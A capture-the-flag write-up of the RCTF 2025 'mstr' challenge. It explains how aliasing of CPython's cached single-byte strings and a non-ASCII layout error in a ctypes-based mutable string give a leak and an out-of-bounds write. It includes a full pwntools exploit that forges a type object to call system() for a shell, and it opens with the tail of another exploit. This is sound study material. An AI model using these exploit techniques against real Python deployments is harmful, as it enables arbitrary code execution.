    alloc_blk(1, 0x10);
    select_blk(1);
    write_data64(0, host_system_addr);
    write_data64(8, host_sh_addr);
    merge_blk(0, 1);
    puts("[+] Gift rewritten.");

    trig_gift();

    munmap((void *)mmio_ptr, 0x2000);
    close(fd);
    return 0;
}

A pointer used for direct MMIO reads and writes must be declared volatile. Otherwise the compiler may optimize the accesses away.

RCTF 2025 mstr Writeup

Author: rik
Date: 2025-11-21
Category: Binary Security

A rare Python-interpreter pwn, with a really interesting bug.

Challenge

Python 3.12.4

import ctypes

from typing import Union, List, Dict

STRPTR_OFFSET = 0x28 
LENPTR_OFFSET = 0x10

class MutableStr:
    pass

class MutableStr:
    def __init__(self, data:str):
        self.data = data
        self.base_ptr = id(self.data)
        self.max_size_str = ""

    def set_max_size(self, max_size_str):
        if int(max_size_str) < ((len(self)+7) & ~7):
            self.max_size_str = max_size_str
        else:
            print("can't set max_size: too big")

    def __repr__(self):
        return self.data

    def __str__(self):
        return self.__repr__()        

    def __len__(self):
        if self.base_ptr is None:
            return 0
        ptr = ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))
        return ptr[0]
    
    def __getitem__(self, key:int):
        if not isinstance(key, int):
            raise NotImplementedError
        if key >= len(self) or key < 0:
            raise RuntimeError("get overflow")
        
        return self.data[key]

    def __setitem__(self, key:int, value:int):
        if not isinstance(value, int):
            raise NotImplementedError("only support integer value")

        if not isinstance(key, int):
            raise NotImplementedError("only support integer key")

        if key >= len(self) or key < 0:
            raise RuntimeError(f"set overflow: length:{len(self)}, key:{key}")
        
        strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
        strptr[key] = value
    
    def __add__(self, other:Union[str,MutableStr]):
        if isinstance(other, str):
            return MutableStr(self.data + other)
        
        if isinstance(other, MutableStr):
            return MutableStr(self.data + other.data)
        
        raise NotImplementedError()
    
    def _add_str(self, other):
        if self.max_size_str == "":
            max_size = (len(self)+7) & ~7
        else:
            max_size = int(self.max_size_str)
        if len(self)+len(other) <= max_size:
            other_len = len(other)
            strptr = ctypes.cast(self.base_ptr + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            otherstrptr = ctypes.cast(id(other) + STRPTR_OFFSET, ctypes.POINTER(ctypes.c_char))
            for i in range(other_len):
                strptr[i+len(self)] = otherstrptr[i]
            if len(self)+other_len < max_size:
                # strptr[len(self)+other_len] = 0 
                pass
            ctypes.cast(self.base_ptr + LENPTR_OFFSET, ctypes.POINTER(ctypes.c_int64))[0] += other_len
        else:
            print("Full!")
        return self
    
    def __iadd__(self, other):
        if isinstance(other, str):
            return self._add_str(other)
        if isinstance(other, MutableStr):
            return self._add_str(other.data)
        return self

def new_mstring(data:str) -> MutableStr:
    return MutableStr(data)

mstrings:List[MutableStr] = []

def main():
    while True:
        try:
            cmd, data, *values = input("> ").split()
            if cmd == "new":
                mstrings.append(new_mstring(data))
            
            if cmd == "set_max":
                idx = int(values[0])
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                mstrings[idx].set_max_size(data)
            
            if cmd == "+":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                mstrings.append(mstrings[idx1]+mstrings[idx2])

            if cmd == "+=":
                idx1 = int(data)
                idx2 = int(values[0])
                if idx1 < 0 or idx1 >= len(mstrings) or idx2 < 0 or idx2 >= len(mstrings):
                    print("invalid index")
                    continue
                mstrings[idx1] += mstrings[idx2]

            if cmd == "print_max":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].max_size_str)

            if cmd == "print":
                idx = int(data)
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                print(mstrings[idx].data)

            if cmd == "modify":
                idx = int(data)
                offset = int(values[0])
                val = values[1]
                
                if idx >= len(mstrings) or idx < 0:
                    print("invalid index")
                    continue
                mstrings[idx][offset] = int(val)
        except EOFError:
            break
        except Exception as e:
            print(f"error: {e}")

print("hello!", flush=True)
main()

TL;DR: Python's str is immutable, so the challenge uses ctypes to force a mutable string type, MutableStr.

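During the contest I hand-wrote a fuzzer and found an interesting crash, but I never figured it out. (Fortunately, it made me realize that CPython has a special optimization for single-byte strings; see below.)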

hello!
> new O
> modify 0 0 0
This can end in a SIGSEGV caused by a NULL pointer dereference.

Bug

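CPython preallocates one object for every single-byte string. These objects live in the python binary's own data segment, and all equal single-byte strings point to the same object. Suppose we first create a MutableStr '6' with new, and then set another MutableStr's max_size_str to '6'. Modifying '6' afterwards also modifies the other MutableStr's max_size_str. (Because of some details of the final getshell, we need 6 rather than 7.)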

hello!
> new 6
> new 0
> set_max 6 1
> print_max 1
6
> += 0 0
> print_max 1
66

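Since max_size_str can now far exceed the string's real capacity, += gives us an overflow write of arbitrary length.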
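The aliasing behind this can be modelled in a few lines of C. This is a toy, not CPython's implementation, and Str, char_singleton and append_in_place are hypothetical. It does reproduce the transcript above: "new 6" and "set_max 6 1" end up holding the same cached object, so "+= 0 0" also changes max_size_str to "66".

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy model, not CPython's implementation: one shared object per single-byte
   character, plus an in-place append like MutableStr._add_str. */
typedef struct { size_t len; char data[16]; } Str;

static Str char_cache[256];

/* Every 1-character string with the same character is the same object. */
static Str *char_singleton(unsigned char c) {
    Str *s = &char_cache[c];
    if (s->len == 0) {            /* lazily "preallocate" on first use */
        s->len = 1;
        s->data[0] = (char)c;
    }
    return s;
}

/* Append src to dst in place, writing through the object pointer. */
static void append_in_place(Str *dst, const Str *src) {
    size_t n = src->len;          /* read first: src may alias dst */
    assert(dst->len + n < sizeof dst->data);
    memmove(dst->data + dst->len, src->data, n);
    dst->len += n;
}
```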

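CPython stores pure-ASCII strings as a PyASCIIObject, which records the length and does not rely on a trailing NUL byte. If the string contains any non-ASCII character, CPython uses a PyCompactUnicodeObject instead. That struct adds two 8-byte fields, utf8_length and utf8, at offset 0x28 (STRPTR_OFFSET). (See Python-3.12.4/Include/cpython/unicodeobject.h.)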

typedef struct {
    PyObject_HEAD
    Py_ssize_t length;
    Py_hash_t hash;
    struct {
        unsigned int interned:2;
        unsigned int kind:3;
        unsigned int compact:1;
        unsigned int ascii:1;
        unsigned int statically_allocated:1;
        unsigned int :24;
    } state;
} PyASCIIObject;

typedef struct {
    PyASCIIObject _base;
    Py_ssize_t utf8_length;
    char *utf8;
} PyCompactUnicodeObject;

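The character data immediately follows these structs (8-byte aligned). CPython stores characters in a fixed-width encoding chosen by the widest character in the string (PEP 393):

- 1 byte per character for Latin-1;
- UCS2 (similar to UTF-16) once a character exceeds U+00FF;
- UCS4 once a character needs more than two bytes.

When utf8 is not NULL, print does not convert UCS2 to UTF-8 again; it prints the string directly from these two fields.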
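The challenge's offsets (LENPTR_OFFSET = 0x10, STRPTR_OFFSET = 0x28) follow from these structs. The C sketch below mirrors them by hand. It assumes a 64-bit build, with PyObject_HEAD expanded to a refcount word and a type pointer. It is for illustration only; real code should include Python.h instead.

```c
#include <assert.h>
#include <stddef.h>

/* Hand-written mirror of the CPython 3.12 structs quoted above (64-bit build).
   Py_ssize_t and Py_hash_t are modelled as ptrdiff_t. */
typedef struct {
    ptrdiff_t ob_refcnt;          /* PyObject_HEAD: reference count */
    void *ob_type;                /* PyObject_HEAD: PyTypeObject * */
    ptrdiff_t length;             /* number of code points */
    ptrdiff_t hash;
    struct {
        unsigned int interned:2;
        unsigned int kind:3;
        unsigned int compact:1;
        unsigned int ascii:1;
        unsigned int statically_allocated:1;
        unsigned int :24;
    } state;
} MirrorASCIIObject;

typedef struct {
    MirrorASCIIObject _base;
    ptrdiff_t utf8_length;
    char *utf8;
} MirrorCompactUnicodeObject;

/* Byte offset of the character data of a compact string object. */
static size_t data_offset(int ascii) {
    return ascii ? sizeof(MirrorASCIIObject) : sizeof(MirrorCompactUnicodeObject);
}
```

In the non-ASCII layout, MutableStr's writes at STRPTR_OFFSET land on utf8_length and utf8 instead of on the character data, which starts at 0x38.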

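MutableStr does not handle the non-ASCII case correctly, however. When concatenating, it still writes at the original offset (STRPTR_OFFSET + len), which ignores the 16 bytes of extra fields. It also still increases the length, and note that Python string lengths count Unicode code points. Combined with tampering with max_size_str, this lets us leak roughly 16 bytes at an arbitrary offset past the Unicode string's data.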
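Some offset arithmetic in C roughly checks why the exploit reads the leak at data_leaked[16:24]. The calculation rests on ASSUMPTIONS that the post does not state:

- compact non-ASCII data starts at 0x38;
- pymalloc rounds each allocation up to a multiple of 16 bytes;
- the allocation includes a terminating character;
- the next object in the pool directly follows the string.

Under these assumptions, the two-character UCS2 string 瑞克 is a 62-byte object in a 64-byte block. The neighbour's ob_type therefore lands 16 bytes into the printed data.

```c
#include <assert.h>
#include <stddef.h>

/* ASSUMPTIONS (64-bit CPython 3.12): compact non-ASCII data starts at 0x38,
   pymalloc rounds requests up to 16 bytes, and the next object sits right after. */
enum { COMPACT_DATA_OFF = 0x38, PYMALLOC_ALIGN = 16, OB_TYPE_OFF = 8 };

static size_t round_up(size_t n, size_t align) { return (n + align - 1) / align * align; }

/* Byte index, within the printed character data, where the neighbour's ob_type starts. */
static size_t neighbour_type_index(size_t nchars, size_t char_width) {
    size_t obj_size = COMPACT_DATA_OFF + (nchars + 1) * char_width;  /* +1: terminator */
    return round_up(obj_size, PYMALLOC_ALIGN) + OB_TYPE_OFF - COMPACT_DATA_OFF;
}

/* Bytes that print reads from the data once MutableStr has bumped the length. */
static size_t bytes_printed(size_t nchars, size_t appended, size_t char_width) {
    return (nchars + appended) * char_width;
}
```

After the exploit's "+= 0 3" appends 20 characters, print covers 44 bytes of data. That comfortably includes bytes 16 to 23.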

Exploit

I really dislike glibc heap pwn. The solution below does not depend on any particular libc version and uses no House-of-anything 🏠.

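Every PyObject has a PyTypeObject pointer describing its type. The type object holds type information and "virtual function" pointers for the various operations. Dynamically allocated objects live in pymalloc arenas (for requests of at most 512 bytes) or on the libc heap, so a neighbouring object's PyTypeObject pointer is likely to sit nearby. Built-in type objects such as PyBytes_Type live in the python binary, so leaking one of these pointers reveals the PIE base.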

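One detail: when the string is actually printed with the print command, the leaked bytes come out as different characters. This is caused by the encoding conversion in builtin_print. Our script must treat the output as a UTF-8 byte stream and convert it back to a UCS2 byte stream to recover the raw leaked bytes.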
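That conversion can be sketched in C. The sketch assumes that every leaked 16-bit unit was printed as a UTF-8 sequence of 1 to 3 bytes; surrogate and non-BMP cases are rejected. It mirrors .decode('utf-8').encode('utf-16-le') in the exploit script, then reads a little-endian pointer from the recovered bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Decode UTF-8 made of 1-3 byte sequences (BMP only) into UTF-16LE bytes, i.e. the
   raw UCS2 data. Returns bytes written, or SIZE_MAX on unsupported/short input.
   Continuation bytes are not validated: this is a sketch for trusted leak output. */
static size_t utf8_to_ucs2le(const uint8_t *in, size_t n, uint8_t *out, size_t cap) {
    size_t i = 0, o = 0;
    while (i < n) {
        uint32_t cp;
        if (in[i] < 0x80) {
            cp = in[i];
            i += 1;
        } else if ((in[i] & 0xE0) == 0xC0 && i + 1 < n) {
            cp = ((uint32_t)(in[i] & 0x1F) << 6) | (in[i + 1] & 0x3Fu);
            i += 2;
        } else if ((in[i] & 0xF0) == 0xE0 && i + 2 < n) {
            cp = ((uint32_t)(in[i] & 0x0F) << 12) | ((uint32_t)(in[i + 1] & 0x3F) << 6) |
                 (in[i + 2] & 0x3Fu);
            i += 3;
        } else {
            return SIZE_MAX;          /* 4-byte (non-BMP) or truncated sequence */
        }
        if (o + 2 > cap)
            return SIZE_MAX;
        out[o++] = (uint8_t)(cp & 0xFF);   /* little-endian code unit */
        out[o++] = (uint8_t)(cp >> 8);
    }
    return o;
}

/* Read a little-endian 64-bit value, like pwntools' u64(). */
static uint64_t load_le64(const uint8_t *p) {
    uint64_t v = 0;
    for (int k = 7; k >= 0; k--)
        v = (v << 8) | p[k];
    return v;
}
```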

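With the base address in hand, we use the out-of-bounds write to overwrite the PyTypeObject pointer of one of the preallocated single-byte string objects mentioned above. We point it at a fake type object (a fake vtable) prepared beforehand. Printing the data that now has the forged vtable then hijacks control flow.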
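Below is a toy C model of the hijack, with illustrative names that are not CPython's. print_obj dispatches through whatever type pointer the object holds. An out-of-bounds write that redirects ob_type to attacker-prepared memory therefore turns the next print into a call to an attacker-chosen function; in the real exploit, that function is system.

```c
#include <assert.h>
#include <stdio.h>

/* Toy object model with illustrative names (not CPython's real structs). */
typedef struct Obj Obj;
typedef struct { const char *name; void (*str)(Obj *self); } Type;
struct Obj { long refcnt; const Type *ob_type; };

static int hijacked;   /* set when the attacker-chosen function runs */

static void real_str(Obj *self) { (void)self; puts("legit str()"); }
static void attacker_fn(Obj *self) { (void)self; hijacked = 1; }  /* stands in for system() */

static const Type RealType = { "str", real_str };

/* "print" never validates ob_type: it just calls through the slot it finds there. */
static void print_obj(Obj *o) {
    o->refcnt++;
    o->ob_type->str(o);
    o->refcnt--;
}
```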

Exp:

from pwn import *

context(arch='amd64', os='linux', log_level='debug', terminal = ['konsole', '-e'])
binary = './python'
io = process([binary, 'mstr.py'])
e = ELF(binary)

itob = lambda x: str(x).encode()
print_leaked = lambda name, addr: success(f'{name}: 0x{addr:x}')

def new_bytes(content: bytes, index: int) -> None:
    io.sendlineafter(b'> ', b'new ' + b'\x00' * len(content))
    context.log_level='info'
    for i, c in enumerate(content):
        io.sendlineafter(b'> ', f'modify {index} {i} {c}'.encode())
    context.log_level='debug'


io.sendlineafter(b'> ', 'new 瑞克'.encode())
io.sendlineafter(b'> ', 'new \x00'.encode()) # for fake type
io.sendlineafter(b'> ', 'new 6'.encode())
io.sendlineafter(b'> ', b'set_max 6 0')
io.sendlineafter(b'> ', b'set_max 6 1')
io.sendlineafter(b'> ', b'+= 2 2')
io.sendlineafter(b'> ', b'+= 2 2') # max size 6666
io.sendlineafter(b'> ', b'new ' + b'\x00' * 20)
io.sendlineafter(b'> ', '+= 0 3'.encode())
io.sendlineafter(b'> ', 'print 0'.encode())

data_leaked = io.recvline(drop=True).decode('utf-8').encode('utf-16-le')
# for i in range(0, len(data_leaked) - 8, 8):
#     print(f'{u64(data_leaked[i: i + 8]):#x}')
e.address = u64(data_leaked[16:24]) - e.sym['PyBytes_Type']
if e.address % 0x1000 != 0:
    exit(1)
print_leaked('elf_base', e.address)

gdb.attach(io, f"awa *{e.sym['_PyRuntime'] + 62000}")  # double quotes: nested ' needs 3.12+ otherwise
# modify PyTypeObject ptr & construct fake PyTypeObject
new_bytes(b'cafebab' + cyclic(40).replace(b'caaadaaa', p64(e.sym['_PyRuntime'] + 62000)).replace(
    # For some reasons, `ph\x00` will become `sh\x00` (+= 3)
    b'aaaa', b'ph\x00\x00') + b'\x00' * 88 + p64(e.plt['system']), 4)
io.sendlineafter(b'> ', b'+= 1 4')

io.sendlineafter(b'> ', 'new \x01'.encode())  # fake type victim
io.sendlineafter(b'> ', 'print 5'.encode())  # invoke virtual function

io.interactive()

🐍🔥🐍🔥🐍🔥🐍🔥

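Because the heap layout differs between runs, the exploit only succeeds with some probability; adding a heap spray should make it succeed every time. The exploit above does not break control-flow integrity, so it gets past SHSTK and IBT even when they are enabled.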